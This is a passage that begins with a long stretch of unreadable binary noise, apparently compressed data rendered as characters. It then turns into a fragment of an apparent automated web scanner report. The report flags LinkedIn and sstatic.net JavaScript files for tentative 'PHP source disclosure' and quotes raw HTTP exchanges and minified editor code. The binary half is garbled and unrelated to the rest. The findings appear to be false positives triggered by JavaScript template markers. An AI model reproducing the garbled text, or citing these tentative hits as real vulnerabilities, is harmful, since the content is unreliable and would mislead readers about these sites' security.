.`.......$.M.].5L2y...fs8........s.....x.....5........P....4.e'..a.m(..l..qh.s...5;.._=.Q.....&....W....s<(YUei.........*.......L.0+...S.S...z.'l,...."    .......^..?..=.;...7n9d.`4....<A.t.P.i.....8f.RH.H@.....    *..
...1..p.c'j.}k...e.G{..j.(....H..fG.'A4.R*6X.....    ....5.....$..@.$..6s|..B!....u..O..0.]Z.?0....'...j5{..w....>..y|.W..HH....."~.\....3..j........!.&j.+........>JH.....>..J.....)..@=q.M.6+..1...O.9.).. .....3.O3z..Uw.....a.'.0..]8.C.).lN..........*.-W... >r.E..M.......U.?v<u}.z$.)....g.3..zP4*.....c./.z&..u.\...&_
ZIn...<....e......5F....P.5..K9n.B......e.}'"..~0P.5.<....]I.,..?.A.45M.d~."<.W....K.s......."..#...Y.......1....U50.[..4...G...wv'. .S5..'D.l... .^.....Ut..s.:..s.....e-RW....b.....v0#.E1...O..}9
.......ep..8E.m1....mA\...$......X...^q.D...v."L.n.../|.....
.J.B.D....... ...^..D:.a!WJ...G...3....B.#...c365..Y#.l+.1.T)......7...m&.\<..X.$...l...Lx..%(....p..O.$.WTb@..b.!.R....E....."P.....a.lZ...LQ...3+.W....a..SBaa...Q.?.[......q.D.m.6.......K,..W....x#~......9..S.*p...u.9/.Yb.....g...>K.R.............5........P...
..k'..a~.-u..ll....e'.".Y.k...........Eo..w...@YZ.$.N..E.EK.&..GE    .`. 8&...3. .O{.)..1ZoL...u.b2.y"...o..N.os.n!FN.".j.....+.q....g\.r..I$.pHh..&6.......!.(.L..7.6..ww........1W4Rn.]@....fR.$e\..O.}......    ..L.6.....$......"&(zx>...?........{...~j4.=V^..b.9...p,<....E;...>9..O..'..zQ..e.w.....|....h.'...u.\....HgU.u8'.'    {Y.<....|....6r..q.... .(uw.....}.
..C!..)...,.....e....d..:.....y.....w....N..H.Co!    .R.........hZ6..5.rb..=..6;../%....P......H>....QW...........Wa..M.).N.ey=...H..b.....Ka...A    .......n..>..h]Y......^....Y......E....^.._W.G.m......d..}.:T3T...}..|..2#o.f..."Y..........._*.~1...\...m..w.r.z.YYD.R..-.?........"YV...X......)e.%Fbi..S..I.{0<.#..=..r.f.]...9.u{.    .XH.......t1R..:...'..<$.]..V...C..[..$....Vx...%...s.;.]....c*0;).L...%7M....h..)2x...Jt...%foC...s`".!........Z...3].8..^4..y...cj...~?.'.Uj...H<6.dO.3).....x.u..:..n/.O=nO..?..Qv...z.<X..-..o..eEZ.....s.z.........M...\..n. .y.S%...Z.[.]0.p.E.....E/4..4......5....%....RS.e...g.X..q....=C'[<....d.:...S.f.....iDW......$R..M.;L..Hh..A7.r.../....EM.t#R...G@.`%/L.~T.z.|../... .^.=....[n&b..7e.......k....B..7.9..4..6V\..%..)2#...L..<.[ 2..9.K..n.@V..!l.Z=.6....6...&..-...u...%. ...MN...?..K!e..B...a!.j....I....1.,D..v..........b.N..r......~."...E.O.
.t.g3..mGo...A..0p..\.....@.pO.A*..L...s.....V..    ..[...3u.....?)\..    xB.b...^)0M"GH|.......F
..*\.k.#.GK...C/..Rto.9a")@.5..z.......N2!K.&...........c.7n._....6..;...S._..<Qz..2'f.M4G.lK..f......y..t_.v!.............<a%..`.....d...2_........<`1/X#9Sy.x!.l.-5.........e.M,..    ..sg.)....Dn.p..aC..].
............P........M.p..Y.....W.....6........P...
..i'.ka~.-(..-..;S ..D.x..^.#kJ....q.@~..I$.I.^%    ........M.L."...Q<.8....F...L:...g.U`Ti..&.B.......>..V.. .....A........i$.pY.C.G...V...<@.`.    6=...t`,...    ^Xe...v.\:..9@....$q.................x..Cij.........6/.......P...
..iG.kaf..(.!l...,...g\...b..]^.$.Nj....T5.*.WycX...'#n.Y...r....o..s.y......    .:s...t....o.=...'    (.&..[.c....`....U...    $.(..h.....$..p.......0.[..c...-T....k.z.X.l.'1..#[P.y..7....yi.F\l....(...s........    ....62....$..@D.x.....z............t.%T..G....YNf..;s.'4...7.2.Hc.4..h...J..~"..;......P`)".......Q.o.....[n)S0..g.q*......*..X..o...S.....K{e.....T.8..D..)..}..X...5...S/..nV..;......U..u+.....~nR.....X<.HD........._.."vT....<..........d...8"F}.....u`...... ..f....M....B.. ...V....#pIW..Rwf.........Kk..e.Q`H5....).F.=......3caO...i2..T....;.pe....?r....A.Kw.I...V..{..>.H..+p1.L......%.V..~..d7.
fwPz..K..T.....*Uk..Z.    .R...t.?..xW...P<..5K\........T&..&Y...8{.3]7.B....)=t LO9(.:..    .M......r.an.?..................J........|...E!t .{-.....jkH..c....!..i...qV1..A.......k3.FV.o4.e...i.x.@3.Ab.-y.y.o.E.Y;....i..(..h|..".X....9.G..o........?v&.........g..."...97...J.uD...P..n..-.bK.......x.rH.......Zg.?.o.f.3D...I6.9................6I.......P...
(uk.ai!...4.!l.....(_^......U.Z:.b.gg..va.....#...O.......D...l.....C...V+.....[bc....B.bJ.G...{.B.......>.T.i%6.6c.B..u2.....@@~......n.....5......Y9. ~....0..3.q9i..........*H...|....gK..:}..I..j.......    ..).6S....$..@..-.. ...A..........H.x)
c...b.?.......@a......1..yA..HE1.E_.J....<N....    .x..].K......C0
..-.C.<fL%N~..#..G..3.Zt}i..`..&{.n~}....ud{b......N.F'......T+]...Ss.'...,...jG7(.9.;...{......j.'E3@.Uy....2].....L]..v.:.._....R....q.E...gz..\..u.H-.E....?.......]...C....k..3.....fB ......I......?..[..@.......8N.3.&\.....w
.U..J..'........=........    ..d1.n.......<.....o}2U..j......H..I.\I.R.;..:l..kR...U..........e...\.W...
Y..3+    ..@.9s^O.    o.eJ.k{......m..jE;.r.m.c.....V.f.C0.....u.2.u.R..>O..... .........).;b..7(s......uP...`.E..N..d.u>..*....$..`R..7`/j...i)...@. .W...V>DL./..E...)9F.....+9.).K)...]..)dq...#h.-..I.,..]2.....h..._.rBJ-d..>R.f..<.:...5z...5..79.kw?>.
...>
...[SNIP]...

19.3. http://platform.linkedin.com/js/anonymousFramework previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://platform.linkedin.com
Path:	/js/anonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/anonymousFramework?v=0.0.1102-RC2.4598 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:47:56 GMT
Expires: Sun, 06 Feb 2011 14:47:56 GMT
Last-Modified: Wed, 26 Jan 2011 01:45:14 GMT
Server: ECS (dca/5334)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 79269

(function(){
var l, doAuth, h = "${VALID_HOST}", a = "", fwk = "http://platform.linkedin.com/js/framework?v=0.0.1102-RC2.4598", xtnreg = /extensions=([^&]*)&?/, xtn = fwk.match(xtnreg);

window.IN = w
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...
<iframe class="<?js= frameClass ?>" id="<?js= windowId ?>" name="<?js= windowId ?>" style="<?js= frameStyles ?>" framespacing="0" frameborder=0 allowtransparency="true">
...[SNIP]...
<form id="<?js= formId ?>" action="javascript:void(0);" method="POST" target="<?js= windowId ?>" style="<?js= formStyles ?>">
...[SNIP]...

19.4. http://sstatic.net/Js/wmd.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://sstatic.net
Path:	/Js/wmd.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /Js/wmd.js?v=508538fa9757 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 30 Jan 2011 11:16:50 GMT
Accept-Ranges: bytes
ETag: "c48fee306fc0cb1:0"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:40 GMT
Content-Length: 39657

var Attacklab=Attacklab||{};var Attacklab=Attacklab||{};Attacklab.showdown=Attacklab.showdown||{};Attacklab.prePreviewHtmlHook=function(a){return a};Attacklab.postPreviewHtmlHook=function(a){return a}
...[SNIP]...
n"+I+"\n\n";I=r(I);I=I.replace(/^[ \t]+$/mg,"");I=e(I);I=m(I);I=H(I);I=E(I);I=I.replace(/~D/g,"$$");I=I.replace(/~T/g,"~");return I};var m=function(I){var I=I.replace(/^[ ]{0,3}\[(.+)\]:[ \t]*\n?[ \t]*<?(\S+?)>?(?=\s|$)[ \t]*\n?[ \t]*((\n*)["(](.+?)[")][ \t]*)?(?:\n+)/gm,function(J,K,L,M,N,O){K=K.toLowerCase();f.set(K,k(L));if(N){return M}else{if(O){F.set(K,O.replace(/"/g,"""))}}return""});return I};var e=function(K){K=K.replace(/\n/g,"\n\n");var I="p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math|ins|del";var J="p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math";K=K.replace(/^(<(p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math|ins|del)\b[^\r]*?\n<\/\2>[ \t]*(?=\n+))/gm,l);K=K.replace(/^(<(p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|script|noscript|form|fieldset|iframe|math)\b[^\r]*?.*<\/\2>[ \t]*(?=\n+)\n)/gm,l);K=K.replace(/(\n[ ]{0,3}(<(hr)\b([^<>])*?\/?>)[ \t]*(?=\n{2,}))/g,l);K=K.replace(/(\n\n[ ]{0,3}<!(--[^\r]*?--\s*)+>
...[SNIP]...
.)/g,"$1`");L=h(L,"\\`*_");return L});return I};var w=function(I){I=I.replace(/(\[((?:\[[^\]]*\]|[^\[\]])*)\][ ]?(?:\n[ ]*)?\[(.*?)\])()()()()/g,A);I=I.replace(/(\[((?:\[[^\]]*\]|[^\[\]])*)\]$[ \t]*()<?((?:\([^)]*$|[^()])*?)>?[ \t]*((['"])(.*?)\6[ \t]*)?\))/g,A);I=I.replace(/(\[([^\[\]]+)\])()()()()()/g,A);return I};var A=function(S,R,V,K,M,Q,U,J){if(J==undefined){J=""}var L=R;var N=V;var O=K.toLowerCase();var P=M;var I=J;if(P==""){if(O==""){O=N.toLowerCase().replace(/ ?\n/g," ")}P="#"+O;if(f.get(O)!=undefined){P=f.get(O);if(F.get(O)!=undefined){I=F.get(O)}}else{if(L.search(/$\s*$$/m)>-1){P=""}else{return L}}}P=h(P,"*_");var T='<a href="'+P+'"';if(I!=""){I=I.replace(/"/g,""");I=h(I,"*_");T+=' title="'+I+'"'}T+=">"+N+"</a>";return T};var t=function(I){I=I.replace(/(!\[(.*?)\][ ]?(?:\n[ ]*)?\[(.*?)\])()()()()/g,s);I=I.replace(/(!\[(.*?)\]\s?$[ \t]*()<?(\S+?)>?[ \t]*((['"])(.*?)\6[ \t]*)?$)/g,s);return I};var s=function(R,Q,V,T,M,P,U,J){var L=Q;var K=V;var N=T.toLowerCase();var O=M;var I=J;if(!I){I=""}if(O==""){if(N==""){N=K.toLowerCase().replace(/ ?\n/g," ")}O="#"+N;if(f.get(N)!=undefined){O=f.get(N);if(F.get(N)!=undefined){I=F.get(N)}}else{return L}}K=K.replace(/"/g,""");O=h(O,"*_");var S='<img src="'+O+'" alt="'+K+'"';I=I.replace(/"/g,""");I=h(I,"*_");S+=' title="'+I+'"';S+=" />";return S};var D=function(I){I=I.replace(/^(.+)[ \t]*\n=+[ \t]*\n+/gm,function(J,K){return d("<h1>"+u(K)+"</h1>")});I=I.replace(/^(.+)[ \t]*\n-+[ \t]*\n+/gm,function(J,K){return d("<h2>"+u(K)+"</h2>")});I=I.replace(/^(\#{1,6})[ \t]*(.+?)[ \t]*\#*\n+/gm,function(J,K,M){var L=K.length;return d("<h"+L+">"+u(M)+"</h"+L+">")});return I};var G;var a=function(J){J+="~0";var I=/^(([ ]{0,3}([*+-]|\d+[.])[ \t]+)[^\r]+?(~0|\n{2,}(?=\S)(?![ \t]*(?:[*+-]|\d+[.])[ \t]+)))/gm;if(z){J=J.replace(I,function(K,L,M){var O=L;var N=(M.search(/[*+-]/g)>-1)?"ul":"ol";var P=G(O,N);P=P.replace(/\s+$/,"");P="<"+N+">"+P+"</"+N+">\n";return P})}else{I=/(\n\n|^\n?)(([ ]{0,3}([*+-]|\d+[.])[ \t]+)[^\r]+?(~0|\n{2,}(?=\S)(?![ \t]*(?:[*+-]|\d+[.])[ \t]+)))/g;J=J.replace(I,function(K,L,M,N){var P=L;var Q=M;var O=(N.search(/[*+-]/g)>-1)?"ul":"ol";var R=G(Q,O);R=P+"<"+O+">\n"+R+"</"+O+">\n";return R})}J=J.replace(/~0/,"");return J};var q={ol:"\\d+[.]",ul:"[*+-]"};G=function(M,L){z++;M=M.replace(/\n{2,}$/,"\n");M+="~0";var I=q[L];var J=new RegExp("(^[ \\t]*)("+I+")[ \\t]+([^\\r]+?(\\n+))(?=(~0|\\1("+I+")[ \\t]+))","gm");var K=false;M=M.replace(J,function(O,P,Q,R){var U=R;var T=P;var N=/\n\n$/.test(U);var S=N||U.search(/\n{2,}/)>-1;if(S||K){U=H(n(U),true)}else{U=a(n(U));U=U.replace(/\n$/,"");U=u(U)}K=N;return"<li>"+U+"</li>\n"});M=M.replace(/~0/g,"");z--;return M};var c=function(I){I+="~0";I=I.replace(/(?:\n\n|^)((?:(?:[ ]{4}|\t).*\n+)+)(\n*[ ]{0,3}[^ \t\n]|(?=~0))/g,function(K,L,N){var J=L;var M=N;J=v(n(J));J=r(J);J=J.replace(/^\n+/g,"");J=J.replace(/\n+$/g,"");J="<pre><code>"+J+"\n</code></pre>";return d(J)+M});I=I.replace(/~0/,"");return I};var d=function(I){I=I.replace(/(^\n+|\n+$)/g,"");return"\n\n~K"+(g.push(I)-1)+"K\n\n"};var B=function(I){I=I.replace(/(^|[^\\])(`+)([^\r]*?[^`])\2(?!`)/gm,function(J,K,L,M,N){var O=M;O=O.replace(/^([ \t]*)/g,"");O=O.replace(/[ \t]*$/g,"");O=v(O);return K+"<code>"+O+"</code>"});return I};var v=function(I){I=I.replace(/&/g,"&");I=I.replace(/</g,"<");I=I.replace(/>/g,">");I=h(I,"*_{}[]\\",false);return I};var j=function(I){I=I.replace(/([\W_]|^)(\*\*|__)(?=\S)([^\r]*?\S[\*_]*)\2([\W_]|$)/g,"$1<strong>$3</strong>$4");I=I.replace(/([\W_]|^)(\*|_)(?=\S)([^\r\*_]*?\S)\2([\W_]|$)/g,"$1<em>$3</em>$4");return I};var i=function(I){I=I.replace(/((^[ \t]*>[ \t]?.+\n(.+\n)*\n*)+)/gm,function(K,L){var J=L;J=J.replace(/^[ \t]*>[ \t]?/gm,"~0");J=J.replace(/~0/g,"");J=J.replace(/^[ \t]+$/gm,"");J=H(J);J=J.replace(/(^|\n)/g,"$1 ");J=J.replace(/(\s*<pre>[^\r]+?<\/pre>)/gm,function(M,N){var O=N;O=O.replace(/^ /mg,"~0");O=O.replace(/~0/g,"");return O});return d("<blockquote>\n"+J+"\n</blockquote>")});return I};var o=function(P,M){P=P.replace(/^\n+/g,"");P=P.replace(/\n+$/g,"");var O=P.split(/\n{2,}/g);var J=new Array();var I=O.length;for(var K=0;K<I;K++){var N=O[K];if(N.search(/~K(\d+)K/g)>=0){J.push(N)}else{if(N.search(/\S/)>=0){N=u(N);N=N.replace(/^([ \t]*)/g,"<p>");N+="</p>";J.push(N)}}}if(!M){I=J.length;for(var K=0;K<I;K++){while(J[K].search(/~K(\d+)K/)>=0){var L=g[RegExp.$1];L=L.replace(/\$/g,"$$$$");J[K]=J[K].replace(/~K\d+K/,L)}}}return J.join("\n\n")};var k=function(I){I=I.replace(/&(?!#?[xX]?(?:[0-9a-fA-F]+|\w+);)/g,"&");I=I.replace(/<(?![a-z\/?\$!])/gi,"<");return I};var x=function(I){I=I.replace(/\$\$/g,b);I=I.replace(/\$[`*_{}\[\]()>#+-.!])/g,b);return I};var C=function(I){I=I.replace(/(^|\s)(https?|ftp)(:\/\/[-A-Z0-9+&@#\/%?=~_|\[\]\($!:,\.;]*[-A-Z0-9+&@#\/%=~_|\[\]])($|\W)/gi,"$1<$2$3>$4");I=I.replace(/<((https?|ftp):[^'">\s]+)>/gi,'<a href="$1">$1</a>');return I};var E=function(I){I=I.replace(/~E(\d+)E/g,function(J,L){var K=parseInt(L);return String.fromCharCode(K)});return I};var n=function(I){I=I.replace(/^(\t|[ ]{1,4})/gm,"~0");I=I.replace(/~0/g,"");return I};var r=function(I){I=I.replace(/\t(?=\t)/g," ");I=I.replace(/\t/g,"~A~B");I=I.replace(/~B(.+?)~A/g,function(K,L,M){var N=L;var O=4-N.length%4;for(var J=0;J<O;J++){N+=" "}return N});I=I.replace(/~A/g," ");I=I.replace(/~B/g,"");return I};var h=function(M,K,J){var I="(["+K.replace(/([\[\]\\])/g,"\\$1")+"])";if(J){I="\\\\"+I}var L=new RegExp(I,"g");M=M.replace(L,b);return M};var b=function(I,J){var K=J.charCodeAt(0);return"~E"+K+"E"}};Attacklab.wmdBase=function(){Attacklab.wmd_env={version:1,output:"Markdown",lineLength:40,buttons:"bold italic link blockquote code image ol ul heading hr"};var k=top.Attacklab;var d=top.document;var j=top.RegExp;var b=top.navigator;k.Util={};k.Position={};k.Command={};k.Global={};var h=k.Util;var n=k.Position;var c=k.Command;var a=k.Global;a.isIE=/msie/.test(b.userAgent.toLowerCase());a.isIE_5or6=/msie 6/.test(b.userAgent.toLowerCase())||/msie 5/.test(b.userAgent.toLowerCase());a.isOpera=/opera/.test(b.userAgent.toLowerCase());var o='<p><b>Insert Hyperlink</b></p><p>http://example.com/ "optional title"</p>';var g="<p><b>Insert Image</b></p><p>http://example.com/images/diagram.jpg \"optional title\"<br><br>Need <a href='http://www.google.com/search?q=free+image+hosting' target='_blank'>free image hosting?</a></p>";var e="http://";var i="http://";var l="../Img/";var f="/editing-help";var m="Markdown Editing Help";k.PanelCollection=function(){this.buttonBar=d.getElementById("wmd-button-bar");this.preview=d.getElementById("wmd-preview");this.output=d.getElementById("wmd-output");this.input=d.getElementById("wmd-input")};k.panels=undefined;k.ieCachedRange=null;k.ieRetardedClick=false;h.isVisible=function(p){if(window.getComputedStyle){return window.getComputedStyle(p,null).getPropertyValue("display")!=="none"}else{if(p.currentStyle){return p.currentStyle.display!=="none"}}};h.addEvent=function(r,q,p){if(r.attachEvent){r.attachEvent("on"+q,p)}else{r.addEventListener(q,p,false)}};h.removeEvent=function(r,q,p){if(r.detachEvent){r.detachEvent("on"+q,p)}else{r.removeEventListener(q,p,false)}};h.fixEolChars=function(p){p=p.replace(/\r\n/g,"\n");p=p.replace(/\r/g,"\n");return p};h.extendRegExp=function(r,t,q){if(t===null||t===undefined){t=""}if(q===null||q===undefined){q=""}var s=r.toString();var p;s=s.replace(/\/([gim]*)$/,"");p=j.$1;s=s.replace(/(^\/|\/$)/g,"");s=t+s+q;return new j(s,p)};h.createImage=function(q){var p=l+q;var r=d.createElement("img");r.className="wmd-button";r.src=p;return r};h.createBackground=function(){var p=d.createElement("div");p.className="wmd-prompt-background";style=p.style;style.position="absolute";style.top="0";style.zIndex="1000";if(a.isIE){style.filter="alpha(opacity=50)"}else{style.opacity="0.5"}var q=n.getPageSize();style.height=q[1]+"px";if(a.isIE){style.left=d.documentElement.scrollLeft;style.width=d.documentElement.clientWidth}else{style.left="0";style.width="100%"}d.body.appendChild(p);return p};h.uploadDialog=function(q){var s;var u;var r;var p=function(v){var w=(v.charCode||v.keyCode);if(w===27){t(null)}};s=$("<div style='top: 50%; left: 50%; display: block; padding: 10px; position: fixed; width:400px; z-index:1001' class='wmd-prompt-dialog'><div style='position: absolute; right: 20px; bottom: 5px; font-size: 10px;'>image hosting by <a title='imgur: the simple image sharer' href='http://imgur.com'>imgur.com</a></div><p><b>Insert an image</b></p><p style='padding-top: 10px;'><a href='#' class='wmd-mini-button selected' id='upload-image-button'>from my computer</a><a href='#' class='wmd-mini-button' id='upload-url-button'>from the web</a></p><iframe id='upload-iframe' style='display:none;' src='about:blank' name='upload-iframe'/><form action='/upload/image' method='post' enctype='multipart/form-data'><div style='position: relative' id='upload-file-input'> <input type='file' name='filename' id='filename-input' value='browse' style='border:0; font-size:18px; position:relative; text-align:right; -moz-opacity:0; filter:alpha(opacity: 0); opacity: 0; z-index: 2;'> <img src='http://i.imgur.com/GKc7H.png' height='15px' width='15px' style='position: absolute; left: 38px; top: 11px;'> <div style='position: absolute; top:0px; left:0px; z-index: 1;'> <input type='input' name='shadow-filename' value='' id='shadow-filename' style='width: 180px; margin-left:64px;'> <input type='button' name='choose-file' id='choose-file' value='Browse ...' style='width: 7em; margin-left: 5px;'> </div></div><div id='upload-url-input' style='display:none;'> <input type='input' name='upload-url' value='' style='width: 250px;'></div><p id='upload-message' style='padding-top: 4px; margin:0; line-height: 16px;'></p><div class='ac_loading' id='image-upload-progress' style='background-color: transparent; display:none;'>Uploading ...</div><input type='submit' value='Upload' style='width: 7em; margin: 10px;'><input type='button' value='Cancel' id='close-dialog-button' style='width: 7em; margin: 10px 10px 20px;'></form></div>");if(a.isIE_5or6){s[0].style.position="absolute";s[0].style.top=d.documentElement.scrollTop+200+"px";s[0].style.left="50%"}u=h.createBackground();var t=function(v){h.removeEvent(d.body,"keydown",p);s.remove();$(u).remove();q(v==undefined?null:v);return false};top.setTimeout(function(){$(d.body).append(s);$("#close-dialog-button").click(function(){t()});var z=$("#upload-image-button");var w=$("#upload-url-button");var v=$("#upload-url-input");var x=v.parent();var B=$("#upload-file-input");v.remove().show();var A=function(){$("#upload-message").text("click browse to choose an image from your computer")};A();z.click(function(){w.removeClass("selected");z.addClass("selected");A();v.remove();x.prepend(B);C();return false});w.click(function(){z.removeClass("selected");w.addClass("selected");$("#upload-message").text("paste the URL of your image above");x.prepend(v);B.remove();return false});var C=function(){$("#filename-input").click(function(){this.blur()});$("#filename-input").change(function(){$("#shadow-filename").val(this.value)})};C();var y=$("#upload-iframe")[0];s.find("form").submit(function(){$("#upload-message").hide();$("#image-upload-progress").show();this.target="upload-iframe";window.closeDialog=t;window.displayUploadError=function(D){$("#image-upload-progress").hide();$("#upload-message").show().text(D)};return true});s[0].style.marginTop=-(n.getHeight(s[0])/2)+"px";s[0].style.marginLeft=-(n.getWidth(s[0])/2)+"px";h.addEvent(d.body,"keydown",p)},0)};h.prompt=function(x,v,s){var u;var w;var t;if(v===undefined){v=""}var r=function(y){var z=(y.charCode||y.keyCode);if(z===27){p(true)}};var p=function(y){h.removeEvent(d.body,"keydown",r);var z=t.value;if(y){z=null}else{z=z.replace("http://http://","http://");z=z.replace("http://https://","https://");z=z.replace("http://ftp://","ftp://");if(z.indexOf("http://")===-1&&z.indexOf("ftp://")===-1&&z.indexOf("https://")===-1){z="http://"+z}}u.parentNode.removeChild(u);w.parentNode.removeChild(w);s(z);return false};var q=function(){u=d.createElement("div");u.className="wmd-prompt-dialog";u.style.padding="10px;";u.style.position="fixed";u.style.width="400px";u.style.zIndex="1001";var A=d.createElement("div");A.innerHTML=x;A.style.padding="5px";u.appendChild(A);var y=d.createElement("form");y.onsubmit=function(){return p(false)};style=y.style;style.padding="0";style.margin="0";style.cssFloat="left";style.width="100%";style.textAlign="center";style.position="relative";u.appendChild(y);t=d.createElement("input");t.type="text";t.value=v;style=t.style;style.display="block";style.width="80%";style.marginLeft=style.marginRight="auto";y.appendChild(t);var B=d.createElement("input");B.type="button";B.onclick=function(){return p(false)};B.value="OK";style=B.style;style.margin="10px";style.display="inline";style.width="7em";var z=d.createElement("input");z.type="button";z.onclick=function(){return p(true)};z.value="Cancel";style=z.style;style.margin="10px";style.display="inline";style.width="7em";y.appendChild(B);y.appendChild(z);h.addEvent(d.body,"keydown",r);u.style.top="50%";u.style.left="50%";u.style.display="block";if(a.isIE_5or6){u.style.position="absolute";u.style.top=d.documentElement.scrollTop+200+"px";u.style.left="50%"}d.body.appendChild(u);u.style.marginTop=-(n.getHeight(u)/2)+"px";u.style.marginLeft=-(n.getWidth(u)/2)+"px"};w=h.createBackground();top.setTimeout(function(){q();var z=v.length;if(t.selectionStart!==undefined){t.selectionStart=0;t.selectionEnd=z}else{if(t.createTextRange){var y=t.createTextRange();y.collapse(false);y.moveStart("character",-z);y.moveEnd("character",z);y.select()}}t.focus()},0)};n.getTop=function(q,r){var p=q.offsetTop;if(!r){while(q=q.offsetParent){p+=q.offsetTop}}return p};n.getHeight=function(p){return p.offsetHeight||p.scrollHeight};n.getWidth=function(p){return p.offsetWidth||p.scrollWidth};n.getPageSize=function(){var r,s;var t,p;if(self.innerHeight&&self.scrollMaxY){r=d.body.scrollWidth;s=self.innerHeight+self.scrollMaxY}else{if(d.body.scrollHeight>d.body.offsetHeight){r=d.body.scrollWidth;s=d.body.scrollHeight}else{r=d.body.offsetWidth;s=d.body.offsetHeight}}if(self.innerHeight){t=self.innerWidth;p=self.innerHeight}else{if(d.documentElement&&d.documentElement.clientHeight){t=d.documentElement.clientWidth;p=d.documentElement.clientHeight}else{if(d.body){t=d.body.clientWidth;p=d.body.clientHeight}}}var u=Math.max(r,t);var q=Math.max(s,p);return[u,q,t,p]};k.undoManager=function(s){var r=this;var v=[];var w=0;var p="none";var z;var x;var C;var A;var D=function(G,F){if(p!=G){p=G;if(!F){B()}}if(!a.isIE||p!="moving"){C=top.setTimeout(E,1)}else{A=null}};var E=function(){A=new k.TextareaState();C=undefined};this.setCommandMode=function(){p="command";B();C=top.setTimeout(E,0)};this.canUndo=function(){return w>1};this.canRedo=function(){if(v[w+1]){return true}return false};this.undo=function(){if(r.canUndo()){if(z){z.restore();z=null}else{v[w]=new k.TextareaState();v[--w].restore();if(s){s()}}}p="none";k.panels.input.focus();E()};this.redo=function(){if(r.canRedo()){v[++w].restore();if(s){s()}}p="none";k.panels.input.focus();E()};var B=function(){var F=A||new k.TextareaState();if(!F){return false}if(p=="moving"){if(!z){z=F}return}if(z){if(v[w-1].text!=z.text){v[w++]=z}z=null}v[w++]=F;v[w+1]=null;if(s){s()}};var t=function(G){var I=false;if(G.ctrlKey||G.metaKey){var H=G.charCode||G.keyCode;var F=String.fromCharCode(H);switch(F){case"y":r.redo();I=true;break;case"z":if(!G.shiftKey){r.undo()}else{r.redo()}I=true;break}}if(I){if(G.preventDefault){G.preventDefault()}if(top.event){top.event.returnValue=false}return}};var q=function(G){if(!G.ctrlKey&&!G.metaKey){var F=G.keyCode;if((F>=33&&F<=40)||(F>=63232&&F<=63235)){D("moving")}else{if(F==8||F==46||F==127){D("deleting")}else{if(F==13){D("newlines")}else{if(F==27){D("escape")}else{if((F<16||F>20)&&F!=91){D("typing")}}}}}}};var y=function(){h.addEvent(k.panels.input,"keypress",function(G){if((G.ctrlKey||G.metaKey)&&(G.keyCode==89||G.keyCode==90)){G.preventDefault()}});var F=function(){if(a.isIE||(A&&A.text!=k.panels.input.value)){if(C==undefined){p="paste";B();E()}}};h.addEvent(k.panels.input,"keydown",t);h.addEvent(k.panels.input,"keydown",q);h.addEvent(k.panels.input,"mousedown",function(){D("moving")});k.panels.input.onpaste=F;k.panels.input.ondrop=F};var u=function(){y();E();B()};u()};k.editor=function(B){if(!B){B=function(){}}var t=k.panels.input;var w=0;var r=this;var C;var A;var q;var v;var y;var s=function(F){t.focus();if(F.textOp){if(y){y.setCommandMode()}var J=new k.TextareaState();if(!J){return}var I=J.getChunks();var H=function(){t.focus();if(I){J.setChunks(I)}J.restore();B()};var G=F.textOp(I,H);if(!G){H()}}if(F.execute){F.execute(r)}};var E=function(){if(y){p(document.getElementById("wmd-undo-button"),y.canUndo());p(document.getElementById("wmd-redo-button"),y.canRedo())}};var p=function(F,H){var J="0px";var I="-20px";var G="-40px";if(H){F.style.backgroundPosition=F.XShift+" "+J;F.onmouseover=function(){this.style.backgroundPosition=this.XShift+" "+G};F.onmouseout=function(){this.style.backgroundPosition=this.XShift+" "+J};if(a.isIE){F.onmousedown=function(){k.ieRetardedClick=true;k.ieCachedRange=document.selection.createRange()}}if(!F.isHelp){F.onclick=function(){if(this.onmouseout){this.onmouseout()}s(this);return false}}}else{F.style.backgroundPosition=F.XShift+" "+I;F.onmouseover=F.onmouseout=F.onclick=function(){}}};var u=function(){var T=document.getElementById("wmd-button-bar");var Z="0px";var L="-20px";var V="-40px";var F=document.createElement("ul");F.id="wmd-button-row";F=T.appendChild(F);var Y=document.createElement("li");Y.className="wmd-button";Y.id="wmd-bold-button";Y.title="Strong <strong> Ctrl+B";Y.XShift="0px";Y.textOp=c.doBold;p(Y,true);F.appendChild(Y);var I=document.createElement("li");I.className="wmd-button";I.id="wmd-italic-button";I.title="Emphasis <em> 